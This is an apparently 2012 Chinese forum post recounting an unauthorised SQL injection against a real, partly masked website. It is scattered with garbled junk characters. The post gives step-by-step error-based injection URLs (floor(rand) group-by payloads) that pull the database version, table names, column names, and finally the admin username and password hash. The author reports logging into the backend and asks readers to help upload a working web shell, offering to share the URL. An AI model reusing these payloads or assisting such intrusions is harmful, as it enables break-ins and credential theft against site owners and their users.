近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
- n$ |8 n& h% z- l2 U4 P H0 b5 |首先找到网站后台,加了个admin,后台出来了 # R7 u- |% I) `1 l' T& N
2 Q$ u; O9 H' T
3 t0 ~' J" M9 m然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
( t7 g4 k N+ A5 E8 Ehttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
' F# W( J" q5 Z0 k' s1 \$ a9 @* W w
2 ]2 b# ~$ ] ~- y& v0 }8 J# m( ^5 Z* Y& \9 Y9 r
% D- `) P% c/ V+ r: ]" ?# z) ~' a
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg4 t$ J" u) [( ^7 Z
1 ^" R, ]. {$ T1 ~* }
: I+ _' _! ^: F! a2 L: @7 J9 {" h7 X( [6 N# u* ?8 O0 j. m
, D! K- O% F4 m6 M2 r8 L) r
可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator
. _- f, B: _$ V( y2 ~/ e% I9 f% v9 _3 Y5 t
" t7 C, L" Y" Y! b+ u x8 ~0 U
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg F1 `* G' }% l+ k
& F& m: |! q& i3 y2 s G. ?$ f
0 {: s7 E- o9 v: m 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--0 w0 u7 u; z; ]6 H. |$ h1 ?& \
, l) l9 Q, p2 k" w1 W+ A: s& Y2 ~: f
* g* z) e- { V 得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--
* ~$ ?4 E* [( a
5 u w. o- r1 R+ P
; D4 g% Y5 Z# j! _! {) Q6 q$ x n
! H% c+ ?8 e' Z# I/ U8 N! P0 V; i' ^ 得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 | 
发表于 2012-12-20 09:00:35
收藏
支持
反对